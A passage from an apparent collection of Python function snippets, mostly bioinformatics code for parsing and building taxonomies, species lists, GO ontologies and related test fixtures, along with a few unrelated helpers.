'/data/hierarchy_'\n file = open(path+prefix + attr + postfix, 'r')\n\n taxonomy = {}\n #dataset_group = dataset.groupby(attr).groups\n\n lines_in = file.readlines()\n file.close()\n lines = [line.strip().split(';') for line in lines_in]\n max_height = max([len(line) for line in lines])\n try:\n float(lines[0][0])\n is_numeric = True\n except ValueError:\n is_numeric = False\n for line in lines:\n #try:\n # if is_numeric:\n # dataset_group[int(line[0])]\n # else:\n # dataset_group[line[0]]\n #except KeyError:\n # continue\n line.reverse()\n for i, val in enumerate(line):\n is_leaf = False\n if val == '*':\n node = TaxNode(val, None, is_numeric, is_leaf)\n else:\n if i == len(line) - 1:\n is_leaf = True\n\n node = TaxNode(val, taxonomy[line[i - 1]][-1], is_numeric, is_leaf)\n try:\n current_nodes = taxonomy[val]\n already_added = False\n for current_node in current_nodes:\n if current_node.parent is None:\n already_added = True\n elif current_node.parent.value == node.parent.value:\n already_added = True\n if not already_added:\n taxonomy[val].append(node)\n except KeyError:\n taxonomy[val] = [node] # Saves the nodes in a list in case of several parents (only valid for nodes with several parents!!!)\n hierarchy = Taxonomy(taxonomy, max_height)\n\n return hierarchy", "def create_species_encode():\n\tdata = pd.read_csv(\"../train.csv\")\n\tspecies = sorted(data.species.unique())\n\tspecies_dict = {species: index for index, species in enumerate(species)}\n\treturn species_dict", "def __getTaxonomnyChainMapping(self, siftsSummaryDirPath, csvFileName):\n fp = os.path.join(siftsSummaryDirPath, csvFileName)\n rowDL = self.__readSiftsSummaryFile(fp)\n logger.info(\"Length of SIFTS summary file %s %d\", csvFileName, len(rowDL))\n logger.debug(\"%r\", list(rowDL[0].items()))\n tD = {}\n for rowD in rowDL:\n entryId = rowD[\"PDB\"]\n chainId = rowD[\"CHAIN\"]\n taxId = rowD[\"TAX_ID\"]\n tD.setdefault(entryId.upper(), {}).setdefault(chainId, {}).update({taxId: True})\n #\n logger.info(\"Taxonomy for %d entries\", len(tD))\n return tD", "def nsrTaxonomy():\r\n # Input file\r\n taxonomyFile = pd.read_csv(args.indir+\"/\"+args.infile1, header=2,\r\n sep=\"\\t\", encoding=\"utf8\")\r\n\r\n # Parse taxonomic names into their elementary components\r\n taxonomy = taxonomyFile.loc[taxonomyFile['rank'] == 'soort']\r\n taxonList = []\r\n for taxon in taxonomy['scientific_name']:\r\n parser = taxonParser(taxon)\r\n if not parser or parser is False:\r\n pass\r\n else:\r\n taxonList.append(parser)\r\n\r\n # Write taxonomy to file\r\n index = 0\r\n with io.open(par_path+\"/results/nsr_species.csv\", \"w\", encoding=\"utf-8\") as outfile:\r\n outfile.write('\"species_id\",\"species_name\",\"identification_reference\"\\n')\r\n for i in taxonList:\r\n binomial = ' '.join(str(i).split()[:2])\r\n authorship = ' '.join(str(i).split()[2:])\r\n outfile.write('%s,%s,\"%s\"\\n' % (index, binomial, authorship))\r\n index += 1\r\n\r\n return taxonList", "def build_phenotype(phenotype_id, adapter):\n phenotype_obj = {}\n phenotype = adapter.hpo_term(phenotype_id)\n if phenotype:\n phenotype_obj[\"phenotype_id\"] = phenotype[\"hpo_id\"]\n phenotype_obj[\"feature\"] = phenotype[\"description\"]\n return phenotype", "def __init__(\n self,\n gene_lists,\n taxon,\n requests_per_sec=10,\n padj_threshold=0.05,\n log2_fc_threshold=0,\n fc_threshold=None,\n enrichment_fdr=0.05,\n annot_col=\"Name\",\n ):\n Ontology.__init__(self)\n PlotGOTerms.__init__(self)\n\n self.gene_lists = gene_lists\n self.enrichment_fdr = enrichment_fdr\n\n # users can set the fold change threshold in the log2 scale or normal\n # scale.\n assert log2_fc_threshold >= 0, \"log2 fc_threshold must be >=0\"\n if fc_threshold is not None:\n log2_fc_threshold = pylab.log2(fc_threshold)\n\n from bioservices import panther, quickgo\n\n self.quick_go_graph = QuickGOGraph()\n\n self.panther = panther.Panther(cache=True)\n self.valid_taxons = [x[\"taxon_id\"] for x in self.panther.get_supported_genomes()]\n self.summary = {}\n\n self._taxon = None\n self.taxon = taxon\n\n self.quickgo = quickgo.QuickGO(cache=True)\n self.quickgo.requests_per_sec = requests_per_sec\n self.quickgo.services.settings.TIMEOUT = 120\n\n self._ancestors = {\n \"MF\": \"GO:0003674\",\n \"CC\": \"GO:0005575\",\n \"BP\": \"GO:0008150\",\n \"SLIM_MF\": \"GO:0003674\",\n \"SLIM_CC\": \"GO:0005575\",\n \"SLIM_BP\": \"GO:0008150\",\n }\n self.ontologies.extend(\n [\n \"ANNOT_TYPE_ID_PANTHER_GO_SLIM_MF\",\n \"ANNOT_TYPE_ID_PANTHER_GO_SLIM_BP\",\n \"ANNOT_TYPE_ID_PANTHER_GO_SLIM_CC\",\n \"ANNOT_TYPE_ID_PANTHER_PC\",\n \"ANNOT_TYPE_ID_PANTHER_PATHWAY\",\n \"ANNOT_TYPE_ID_REACTOME_PATHWAY\",\n ]\n )\n\n self.ontology_aliases.extend(\n [\n \"SLIM_MF\",\n \"SLIM_BP\",\n \"SLIM_CC\",\n \"PROTEIN\",\n \"PANTHER_PATHWAY\",\n \"REACTOME_PATHWAY\",\n ]\n )\n\n # panther accepts onyl ~2-3000 genes at max. Let us restrict the analysis\n # to the first 2000 genes based on their log2 fold change 2000 + and\n # 2000 negatives\n\n msg = \"Ignoring DEGs with adjusted p-value > {} and fold change in [{}, {}]\".format(\n padj_threshold, 1 / (2**log2_fc_threshold), 2**log2_fc_threshold\n )\n logger.info(msg)\n\n # used in report module\n self.summary[\"fold_change_range\"] = [\n 1 / (2**log2_fc_threshold),\n 2**log2_fc_threshold,\n ]\n self.summary[\"padj_threshold\"] = padj_threshold\n\n fc_threshold = log2_fc_threshold\n\n for x in sorted(gene_lists.keys()):\n\n N = len(gene_lists[x])\n logger.info(f\"Starting with {N} genes from category '{x}'\")\n\n self.summary[\"DGE_after_filtering\"] = {k: len(v) for k, v in gene_lists.items()}\n\n self.enrichment = {}\n self.stats = {}\n self.obsolets = []", "def testTaxaData(self):\n try:\n numEukaryota = 0\n numBacteria = 0\n numVirus = 0\n numArchaea = 0\n numOther = 0\n numUnclass = 0\n logger.info(\"Loading taxonomy data\")\n tU = TaxonomyUtils()\n logger.info(\"Done loading taxonomy data\")\n iCount = 0\n entryD = self.__mU.doImport(self.__instanceSavePath, fmt=\"pickle\")\n for entryId in entryD:\n for entityId, eD in entryD[entryId][\"selected_polymer_entities\"].items():\n taxId = eD[\"ncbi_taxonomy_id\"] if \"ncbi_taxonomy_id\" in eD else None\n if taxId is None:\n logger.debug(\"Missing taxId entryId %s entityId %s\", entryId, entityId)\n continue\n # lin = tU.getLineage(taxId)\n # nmL = tU.getLineageNames(taxId)\n ok1 = tU.isEukaryota(taxId)\n if ok1:\n numEukaryota += 1\n ok3 = tU.isVirus(taxId)\n if ok3:\n numVirus += 1\n ok2 = tU.isBacteria(taxId)\n if ok2:\n numBacteria += 1\n #\n ok4 = tU.isArchaea(taxId)\n if ok4:\n numArchaea += 1\n #\n ok5 = tU.isOther(taxId)\n if ok5:\n numOther += 1\n #\n ok6 = tU.isUnclassified(taxId)\n if ok6:\n numUnclass += 1\n\n if ok1 and (ok1 and ok2):\n logger.info(\"taxid %r conflicting lineage\", taxId)\n #\n if not ok1 and not ok2 and not ok3 and not ok4 and not ok5 and not ok6:\n logger.info(\"unassigned taxid %r\", taxId)\n\n logger.debug(\"taxId %r entryId %s entityId %s\", taxId, entryId, entityId)\n iCount += 1\n # if iCount > 5000:\n # break\n logger.info(\"Eukaryota %d Bacteria %d Virus %d Archaea %d Other/Syn %r Unclass %d\", numEukaryota, numBacteria, numVirus, numArchaea, numOther, numUnclass)\n except Exception as e:\n logger.exception(\"Failing with %s\", str(e))\n self.fail()", "def create_specimen_taxonomy():\n\n form = TaxonomyForm()\n if session.get(\"link\") is not None:\n if form.validate_on_submit():\n session[\"common_name\"] = (\n form.common_name.data or Taxonomy.common_name.default.arg\n )\n session[\"species\"] = form.species.data or Taxonomy.species.default.arg\n session[\"genus\"] = form.genus.data or Taxonomy.genus.default.arg\n session[\"family\"] = form.family.data or Taxonomy.family.default.arg\n session[\"order\"] = form.order.data or Taxonomy.order.default.arg\n session[\"phylum\"] = form.phylum.data or Taxonomy.phylum.default.arg\n session[\"kingdom\"] = form.kingdom.data or Taxonomy.kingdom.default.arg\n session[\"authorship\"] = (\n form.authorship.data or Taxonomy.authorship.default.arg\n )\n\n return redirect(\"/specimen/new/details\")\n\n else:\n return render_template(\n \"newspecimen.html\", form=form, step=\"taxonomy\"\n )\n else:\n return (\"\", 403)", "def create_all_taxonomic_keys(point_locations: dict, location_species: dict, location_range_species: dict,\n trait_data: dict, all_taxa_data: dict) -> dict:\n\n all_keys = {}\n\n # find all unique sets of species\n species_sets = set()\n for p in point_locations:\n loc = point_locations[p]\n all_species = set()\n all_species |= location_species[loc.name]\n if loc.n_direct_children() > 0:\n for c in loc.direct_children():\n all_species |= fetch_child_data(c, location_species)\n\n range_species = set(find_species_by_name(s) for s in location_range_species[loc])\n all_species |= range_species\n if len(all_species) > 0:\n species_sets.add(frozenset(all_species))\n\n # create keys for each unique set of species\n warnings = set()\n for sp_set in species_sets:\n taxa_data = {}\n for s in sp_set:\n try:\n taxa_data[\"Male \" + s.binomial()] = all_taxa_data[\"♂ Male {{\" + s.species + \"}}\"]\n taxa_data[\"Female \" + s.binomial()] = all_taxa_data[\"♀ Female {{\" + s.species + \"}}\"]\n except KeyError:\n report_error(\"Missing taxonomic key data: \" + s.species)\n\n all_keys[sp_set], new_warning = TMB_TaxKeyGen.generate_taxonomic_key(trait_data, taxa_data, verbose=False)\n warnings |= new_warning\n\n # global key for all species\n all_keys[\"all\"], new_warning = TMB_TaxKeyGen.generate_taxonomic_key(trait_data, all_taxa_data, verbose=False)\n warnings |= new_warning\n\n for w in sorted(warnings):\n report_error(w)\n\n return all_keys", "def update_tip_names(tree, taxdict):\n\n list_nodes = []\n uniprot_mapping = pd.DataFrame(columns=['taxid', 'name', 'uniprot'])\n\n counter = 0\n for node in tree.traverse(\"postorder\"):\n current_name = node.name\n\n if 'NMR' in current_name:\n new_name = \"Heterocephalus_glaber\"\n node.name = new_name\n list_nodes.append(node.name)\n taxid = \"NA\" \n uniprot_mapping.loc[counter] = (taxid, new_name, \"UP000006813\")\n counter += 1\n\n elif 'Nfurzer' in current_name:\n new_name = \"Nothobranchius_furzeri\"\n node.name = new_name\n list_nodes.append(node.name)\n taxid = \"NA\"\n uniprot_mapping.loc[counter] = (taxid, new_name, new_name)\n counter += 1\n\n elif 'TAX' in current_name:\n taxid = current_name[3:].split('x')[0]\n new_name = taxdict.get(taxid, taxid) \n node.name = new_name \n list_nodes.append(node.name)\n unip = get_uniprot(taxid, accession)\n uniprot_mapping.loc[counter] = (taxid, new_name, unip)\n counter += 1\n\n\n \n tree.write(outfile=\"../../data/tree/tree.nw\")\n\n nodes_df = pd.DataFrame(list_nodes)\n nodes_df.to_csv(\"../../data/tree/tree_list_nodes.txt\", index=False, header=False)\n\n uniprot_mapping.to_csv(\"../../data/tree/tree_uniprot.txt\", sep='\\t', index=False, header=True)\n\n return tree, list_nodes", "def duplicate_names(self, taxonomy, check_species=True):\n\n # get lineages for each taxon name\n taxon_lineages = defaultdict(set)\n for taxa in taxonomy.values():\n for i, taxon in enumerate(taxa):\n if len(taxon) > 3:\n taxon_lineages[taxon].add(';'.join(taxa[0:i + 1]))\n\n # identify taxon belonging to multiple lineages\n duplicates = {}\n for taxon, lineages in taxon_lineages.items():\n if len(lineages) >= 2:\n if not taxon.startswith('s__') or check_species:\n duplicates[taxon] = lineages\n\n return duplicates", "def fill_taxonomy_database(taxids, password):\r\n\r\n for taxid in taxids:\r\n lineage = ncbi.get_lineage(taxid)\r\n names = ncbi.get_taxid_translator(lineage)\r\n print(lineage)\r\n print([names[taxid] for taxid in lineage])\r\n\r\n previous = \"\"\r\n\r\n for lin in lineage:\r\n if int(lin) != 1: # skipping 'root'\r\n rank = ncbi.get_rank([lin])\r\n SQL_connection = set_connection(password)\r\n cursor = SQL_connection.cursor(buffered=True)\r\n cursor.execute(\r\n \"select * \"\r\n \"from Taxonomie \"\r\n \"where taxonomy_ID = {};\".format(\r\n lin))\r\n results = cursor.fetchone()\r\n if results is None:\r\n if previous == \"\":\r\n cursor.execute(\"insert into Taxonomie \"\r\n \"(rank_up, taxonomy_ID, naam, rang) \"\r\n \"values(NULL, {}, '{}', '{}');\".format(\r\n lin, names[lin], rank[lin]))\r\n SQL_connection.commit()\r\n else:\r\n cursor.execute(\"insert into Taxonomie \"\r\n \"(rank_up, taxonomy_ID, naam, rang) \"\r\n \"values({}, {}, '{}', '{}');\".format(\r\n previous, lin, names[lin], rank[lin]))\r\n SQL_connection.commit()\r\n cursor.close()\r\n SQL_connection.close()\r\n previous = lin", "def create_city():\n city = {}\n city['biysk'] = {}\n city['biysk']['barnaul'] = 9\n city['biysk']['novosibirsk'] = 11\n city['biysk']['belokurikha'] = 8\n city['barnaul'] = {}\n city['barnaul']['tomsk'] = 4\n city['belokurikha'] = {}\n city['belokurikha']['novosibirsk'] = 2\n city['novosibirsk'] = {}\n city['novosibirsk']['barnaul'] = 2\n city['novosibirsk']['tomsk'] = 5\n city['novosibirsk']['omsk'] = 20\n city['tomsk'] = {}\n city['tomsk']['krasnoyarsk'] = 6\n city['krasnoyarsk'] = {}\n city['krasnoyarsk']['omsk'] = 7\n city['omsk'] = {}\n return city", "def createIndivitual(self) -> Dict[str, Any]:\n ind = {\n \"genome\": {\n key: numpy.random.randint(0, len(value), size=self.ref_count[key]) for (\n key, value) in self.grammar.items()\n },\n \"fitness\": None,\n \"fenotype\": None,\n }\n return ind", "def get_species_list() -> list:\n c2h2_xyz = {'symbols': ('C', 'C', 'H', 'H'), 'isotopes': (12, 12, 1, 1),\n 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 1.203142), (0.0, -0.0, 2.265747), (-0.0, -0.0, -1.062605))}\n ch4_xyz = {'symbols': ('C', 'H', 'H', 'H', 'H'), 'isotopes': (12, 1, 1, 1, 1),\n 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 1.08744517), (1.02525314, 0.0, -0.36248173),\n (-0.51262658, 0.88789525, -0.36248173), (-0.51262658, -0.88789525, -0.36248173))}\n co2_xyz = {'symbols': ('C', 'O', 'O'), 'isotopes': (12, 16, 16),\n 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 1.1594846), (0.0, 0.0, -1.1594846))}\n co_xyz = {'symbols': ('O', 'C'), 'isotopes': (16, 12), 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 1.12960815))}\n f2_xyz = {'symbols': ('F', 'F'), 'isotopes': (19, 19), 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 1.3952041))}\n ch2o_xyz = {'symbols': ('O', 'C', 'H', 'H'), 'isotopes': (16, 12, 1, 1),\n 'coords': ((0.0, 0.0, 0.674622), (0.0, 0.0, -0.529707),\n (0.0, 0.935488, -1.109367), (0.0, -0.935488, -1.109367))}\n h2o_xyz = {'symbols': ('O', 'H', 'H'), 'isotopes': (16, 1, 1),\n 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 0.95691441), (0.92636305, 0.0, -0.23986808))}\n h2_xyz = {'symbols': ('H', 'H'), 'isotopes': (1, 1), 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 0.74187646))}\n hcn_xyz = {'symbols': ('C', 'N', 'H'), 'isotopes': (12, 14, 1),\n 'coords': ((0.0, 0.0, -0.500365), (0.0, 0.0, 0.65264), (0.0, 0.0, -1.566291))}\n hf_xyz = {'symbols': ('F', 'H'), 'isotopes': (19, 1), 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 0.91538107))}\n n2o_xyz = {'symbols': ('N', 'N', 'O'), 'isotopes': (14, 14, 16),\n 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 1.12056262), (0.0, 0.0, 2.30761092))}\n n2_xyz = {'symbols': ('N', 'N'), 'isotopes': (14, 14), 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 1.09710935))}\n nh3_xyz = {'symbols': ('N', 'H', 'H', 'H'), 'isotopes': (14, 1, 1, 1),\n 'coords': ((0.0, 0.0, 0.11289), (0.0, 0.938024, -0.263409),\n (0.812353, -0.469012, -0.263409), (-0.812353, -0.469012, -0.263409))}\n oh_xyz = {'symbols': ('O', 'H'), 'isotopes': (16, 1), 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 0.967))}\n cl2_xyz = {'symbols': ('Cl', 'Cl'), 'isotopes': (35, 35), 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 1.1))}\n\n c2h2 = ARCSpecies(label='C2H2', smiles='C#C', multiplicity=1, charge=0)\n c2h2.initial_xyz = c2h2_xyz\n\n ch4 = ARCSpecies(label='CH4', smiles='C', multiplicity=1, charge=0)\n ch4.initial_xyz = ch4_xyz\n\n co2 = ARCSpecies(label='CO2', smiles='O=C=O', multiplicity=1, charge=0)\n co2.initial_xyz = co2_xyz\n\n co = ARCSpecies(label='CO', smiles='[C-]#[O+]', multiplicity=1, charge=0)\n co.initial_xyz = co_xyz\n\n f2 = ARCSpecies(label='F2', smiles='[F][F]', multiplicity=1, charge=0)\n f2.initial_xyz = f2_xyz\n\n ch2o = ARCSpecies(label='CH2O', smiles='C=O', multiplicity=1, charge=0)\n ch2o.initial_xyz = ch2o_xyz\n\n h2o = ARCSpecies(label='H2O', smiles='O', multiplicity=1, charge=0)\n h2o.initial_xyz = h2o_xyz\n\n h2 = ARCSpecies(label='H2', smiles='[H][H]', multiplicity=1, charge=0)\n h2.initial_xyz = h2_xyz\n\n hcn = ARCSpecies(label='HCN', smiles='C#N', multiplicity=1, charge=0)\n hcn.initial_xyz = hcn_xyz\n\n hf = ARCSpecies(label='HF', smiles='F', multiplicity=1, charge=0)\n hf.initial_xyz = hf_xyz\n\n n2o = ARCSpecies(label='N2O', smiles='[N-]=[N+]=O', multiplicity=1, charge=0)\n n2o.initial_xyz = n2o_xyz\n\n n2 = ARCSpecies(label='N2', smiles='N#N', multiplicity=1, charge=0)\n n2.initial_xyz = n2_xyz\n\n nh3 = ARCSpecies(label='NH3', smiles='N', multiplicity=1, charge=0)\n nh3.initial_xyz = nh3_xyz\n\n oh = ARCSpecies(label='OH', smiles='[OH]', multiplicity=2, charge=0)\n oh.initial_xyz = oh_xyz\n\n cl2 = ARCSpecies(label='Cl2', smiles='[Cl][Cl]', multiplicity=1, charge=0)\n cl2.initial_xyz = cl2_xyz\n\n species_list = [c2h2, ch4, co2, co, f2, ch2o, h2o, h2, hcn, hf, n2o, n2, nh3, oh, cl2]\n\n return species_list", "def test_taxonomy(n=5):\n ecoli_file = join(this_dir, \"e_coli_core.xml.gz\")\n ids = [\"Escherichia_coli_{}\".format(i) for i in range(1, n + 1)]\n taxa = pd.DataFrame({\"id\": ids})\n taxa[\"genus\"] = \"Escherichia\"\n taxa[\"species\"] = \"Eschericia coli\"\n taxa[\"reactions\"] = 95\n taxa[\"metabolites\"] = 72\n taxa[\"file\"] = ecoli_file\n return taxa", "def dict_initialise(metadata, analysistype):\n for sample in metadata:\n sample[analysistype].dnaseq = dict()\n sample[analysistype].protseq = dict()\n sample[analysistype].ntindex = dict()\n sample[analysistype].aaindex = dict()\n sample[analysistype].ntalign = dict()\n sample[analysistype].aaalign = dict()\n sample[analysistype].aaidentity = dict()\n return metadata", "def read_mothur_cons_taxonomy(f):\n d_otu2tax = {}\n for n, line in enumerate(open(f)):\n # the first header line does not startswith \"#\" in v1.33\n if line.startswith('OTU\\tSize\\tTaxonomy'):\n continue\n\n if line.startswith('#'):\n continue\n\n line = line.rstrip()\n otu, num, taxa = line.rstrip().split('\\t')\n skip = False\n for word in EXCLUDE:\n if word in taxa:\n skip = True\n break\n\n if skip:\n continue \n\n # the parsing of taxa works for both mothur output and this\n taxa = taxa.rstrip(';') # for mothur classfy.seqs output\n lis = taxa.split(';')\n lis2 = []\n for item in lis:\n item = item.strip() # for copyrigher copy table ' ;' separater\n if item.endswith(')'):\n item = item.rsplit('(', 1)[0].strip()\n\n # remove taxon level prefix, e.g. 'p__Firmicutes'\n if '__' in item:\n item = item.split('__', 1)[1]\n\n #item = item.strip('\"')\n\n # green gene taxonomy has sapce\n item = item.replace(' ', '_')\n\n item = item.lower()\n if item in ['unknown', 'unclassified', 'other', 'unassigned']:\n item = 'Unclassifed'\n\n item = item.capitalize()\n lis2.append(item)\n\n length = len(lis2)\n mes = 'levels number ({}) is not ({}): {}'\n assert length == LEVELS, mes.format(\n length, LEVELS, repr(lis2))\n d_otu2tax[otu] = tuple(lis2)\n\n return d_otu2tax", "def test_parse_taxonomy_to_otu_metadata(self):\r\n example_tax = \\\r\n \"\"\"412 PC.635_647\tRoot;Bacteria;Firmicutes;\"Clostridia\";Clostridiales\t0.930\r\n319 PC.355_281\tRoot;Bacteria;Bacteroidetes\t0.970\r\n353 PC.634_154\tRoot;Bacteria;Bacteroidetes\t0.830\r\n17 PC.607_302\tRoot;Bacteria;Bacteroidetes\t0.960\r\n13\tRoot;Bacteria;Firmicutes;\"Clostridia\";Clostridiales\t0.870\r\n338 PC.593_1314\tRoot;Bacteria\t0.990\"\"\"\r\n actual = parse_taxonomy_to_otu_metadata(example_tax.split('\\n'))\r\n expected = {\r\n '412': {'taxonomy': ['Root', 'Bacteria', 'Firmicutes',\r\n '\"Clostridia\"', 'Clostridiales'], 'score': 0.930},\r\n '319':\r\n {'taxonomy': ['Root',\r\n 'Bacteria',\r\n 'Bacteroidetes'],\r\n 'score': 0.970},\r\n '353':\r\n {'taxonomy': ['Root',\r\n 'Bacteria',\r\n 'Bacteroidetes'],\r\n 'score': 0.830},\r\n '17':\r\n {'taxonomy': ['Root',\r\n 'Bacteria',\r\n 'Bacteroidetes'],\r\n 'score': 0.960},\r\n '13': {'taxonomy': ['Root', 'Bacteria', 'Firmicutes',\r\n '\"Clostridia\"', 'Clostridiales'], 'score': 0.870},\r\n '338': {'taxonomy': ['Root', 'Bacteria'], 'score': 0.990}}\r\n self.assertEqual(actual, expected)", "def create_tree_objects(tree_ids_list, species_list):\n\ttree_objects = []\n\n\tfor tree_id in tree_ids_list:\n\t\tfname = tree_id+\".nex\"\t\n\t\ttree_nxobj = dendropy.Tree.get(file=open(data_folder+fname, \"r\"), schema=\"nexus\")\n\t\ttree_size = count_taxa_tree(tree_nxobj)\n\t\tfound_list = []\n\t\tfor species in species_list:\t\n\t\t\tnode = tree_nxobj.find_node_with_taxon_label(species)\n\t\t\tif node is None:\n\t\t\t\tcontinue #taxon not found\n\t\t\telse:\n\t\t\t\tfound_list.append(species)\n\n\t\tif len(found_list) > 0: #removing trees that do not contain any of the input species\n\t\t\ttree_objects.append(TBTree(tree_id, tree_size, found_list))\n\n\treturn tree_objects", "def divide_to_species(self):\n titles = []\n for i in self.rest:\n titles.append(i.title.split(\" \"))\n for i in range(len(titles)):\n for j in range(i, len(titles)):\n if titles[i][0] == titles[j][0] and titles[i][1] == titles[j][1]:\n if \" \".join(titles[i]) not in [z.title for z in self.species[\" \".join(titles[i][:2])]]:\n self.rest[i].species = \" \".join(titles[i])\n self.species[\" \".join(titles[i][:2])].append(self.rest[i])\n if \" \".join(titles[j]) not in [z.title for z in self.species[\" \".join(titles[j][:2])]]:\n self.rest[j].species = \" \".join(titles[j])\n self.species[\" \".join(titles[j][:2])].append(self.rest[j])\n\n self.name_of_species = list(self.species.keys())\n\n for i in self.species.keys():\n self.count_species[i] = len(self.species[i])", "def test_create_gene_ontology(self):\n\n # Here are mappings for just a few yeast genes.\n\n mapping = {}\n mapping['STE7'] = ['GO:0000187']\n mapping['PBS2'] = ['GO:0000187']\n mapping['NOP8'] = [\n 'GO:0003676', 'GO:0003723', 'GO:0042254', 'GO:0005634', 'GO:0005730'\n ]\n\n # Build the ontology, then see if it looks correct.\n\n root = dc.models.tensorgraph.models.ontology.create_gene_ontology(\n mapping, min_node_features=1)\n assert len(root.feature_ids) == 0\n\n def find_features(node, features):\n features.update(node.feature_ids)\n for child in node.children:\n find_features(child, features)\n\n all_features = set()\n find_features(root, all_features)\n assert len(all_features) == 3\n for key in mapping:\n assert key in all_features", "def construct_occurrence_dico(data) :\n print('Constructing occurence dictionnaries...')\n\n p_kw_dico = dict()\n kw_p_dico = dict()\n full_stem_dico = {}\n for patent in data :\n patent_id = patent['id']\n #[keywords,stem_dico] = extract_keywords(patent[1]+\". \"+patent[2],patent_id)\n [keywords,stem_dico] = extract_keywords(patent['title']+\". \"+patent['abstract'],patent_id)\n #print(keywords)\n\n for k in keywords :\n # add to p_kw dico\n if k in kw_p_dico :\n kw_p_dico[k].append(patent_id)\n else :\n kw_p_dico[k]= [patent_id]\n #\n if patent_id in p_kw_dico :\n p_kw_dico[patent_id].append(k)\n else :\n p_kw_dico[patent_id] = [k]\n\n for k in stem_dico.keys():\n if k in full_stem_dico :\n full_stem_dico[k]=full_stem_dico[k].union(stem_dico[k])\n else :\n full_stem_dico[k] = stem_dico[k]\n\n return([p_kw_dico,kw_p_dico,full_stem_dico])", "def add_agr_prefix_by_species_taxon(identifier, taxon_id):\n species_dict = {\n 7955: 'ZFIN:',\n 6239: 'WB:',\n 10090: '', # No MGI prefix\n 10116: '', # No RGD prefix\n 559292: 'SGD:',\n 4932: 'SGD:',\n 7227: 'FB:',\n 9606: '', # No HGNC prefix\n 2697049: '' # No SARS-CoV-2 prefix\n }\n\n new_identifier = species_dict[taxon_id] + identifier\n\n return new_identifier", "def network_nodes_species(self):\n G, mapping = self.network()\n waste, resources, intmed_products = self.amenities()\n\n node_dict = {}\n\n for nd in G:\n # print(nd)\n if isinstance(nd, int):\n node_dict[nd] = \"r\"\n elif nd in self.commodity:\n node_dict[nd] = \"Xc\"\n elif nd in waste:\n node_dict[nd] = \"w\"\n elif nd in resources:\n node_dict[nd] = \"Xr\"\n elif nd in intmed_products:\n node_dict[nd] = \"InPr\"\n\n return node_dict", "def stats_orgs(df, new_data=False):\n rows = []\n\n if new_data:\n df = df[df.index.isin(in_taxa_dict.keys())]\n else:\n df = df[df.index.isin(db_taxa_dict.keys())]\n\n df2 = df.copy()\n df2[df2 >= 1] = 1\n\n df = df.sum(axis=1).to_frame()\n\n if new_data:\n df[f\"Genes out of {len(matrix.columns)}\"] = df2.sum(axis=1).to_frame()\n df = df.rename(columns={0: f\"Sequences Collected\"})\n\n else:\n df = df.rename(columns={0: f\"Genes out of {len(matrix.columns)}\"})\n\n # Fill in taxonomic information\n if new_data:\n list_of_dicts = [{key: value[i] for key, value in in_taxa_dict.items()} for i in range(3)]\n else:\n list_of_dicts = [{key: value[i] for key, value in db_taxa_dict.items()} for i in range(3)]\n df['Long Name'] = df.index.map(list_of_dicts[2])\n df['Higher Taxonomy'] = df.index.map(list_of_dicts[0])\n df['Lower Taxonomy'] = df.index.map(list_of_dicts[1])\n\n # Rearrange Columns to Put Genes after taxa stats\n cols = df.columns.tolist()\n cols = cols[2:] + cols[:2]\n df = df[cols]\n\n if new_data:\n routes_dict = get_routes()\n list_of_routes_dicts = [{key: value[i] for key, value in routes_dict.items()} for i in range(3)]\n df[\"#SBH\"] = df.index.map(list_of_routes_dicts[0])\n df[\"#BBH\"] = df.index.map(list_of_routes_dicts[1])\n df[\"#HMM\"] = df.index.map(list_of_routes_dicts[2])\n out_filename = 'new_taxa_stats.tsv'\n else:\n out_filename = 'db_taxa_stats.tsv'\n\n # Fill in columns for including in SGT construction. By default all are yes\n has_paralogs = check_paralogs()\n if new_data:\n sgt_dict = {org: 'yes' for org in in_taxa_dict.keys()}\n else:\n sgt_dict = {org: 'yes' for org in db_taxa_dict.keys()}\n df['SGT'] = df.index.map(sgt_dict)\n\n # Fill in column for paralogs. If no paralogs entry is 'none'.\n # If there are paralogs entry is 'yes'. If there are paralogs, but --ortholog_only is given entry is 'no'.\n if new_data:\n pass\n else:\n paralogs_dict = {org: ('yes' if org in has_paralogs and not args.orthologs_only\n else 'no' if org in has_paralogs and args.orthologs_only else 'none')\n for org in db_taxa_dict}\n df['Paralogs'] = df.index.map(paralogs_dict)\n\n df = df.rename_axis('Unique ID')\n df.to_csv(f'{output_fold}/{out_filename}', sep='\\t')", "def hierachy_nomenclature(a2_data):\n ret_dic = OrderedDict()\n ret_dic['X'] = OrderedDict()\n ret_dic['X']['name'] = a2_data['xs'].keys()\n ret_dic['X']['N'] = len(a2_data['xs'].keys())\n ret_dic['I'] = OrderedDict()\n ret_dic['I']['name'] = a2_data['xs']['1'].keys()\n ret_dic['I']['N'] = len(a2_data['xs']['1'].keys())\n ret_dic['R'] = OrderedDict()\n ret_dic['R']['name'] = a2_data['xs']['1']['U235'].keys()\n ret_dic['R']['N'] = len(a2_data['xs']['1']['U235'].keys())\n ret_dic['G'] = OrderedDict()\n ret_dic['G']['name'] = a2_data['xs']['1']['U235']['abso'].keys()\n ret_dic['G']['N'] = len(a2_data['xs']['1']['U235']['abso'].keys())\n return ret_dic", "def mk_json_ions(dlas, prefix, outfil):\n # Sort\n ra = dlas.coord.ra.degree[0]\n srt = np.argsort(np.array(ra))\n\n all_ions = {}\n # Loop on DLA\n for jj, isrt in enumerate(srt):\n idla = dlas._abs_sys[isrt]\n # Astropy Table\n ion_tab = idla._ionN\n # Convert key to standard names\n new_dict = {}\n for row in ion_tab:\n Zion = (row['Z'], row['ion'])\n # Skip HI\n if Zion == (1,1):\n continue\n # Get name\n new_key = ltai.ion_name(Zion)\n # Fine structure?\n if row['Ej'] > 0.:\n new_key = new_key+'*'\n new_dict[new_key] = dict(zip(row.dtype.names, row))\n # Write to all_ions\n name = survey_name(prefix, idla)\n all_ions[name] = new_dict\n\n # Write\n print('Writing {:s}'.format(outfil))\n with io.open(outfil, 'w', encoding='utf-8') as f:\n 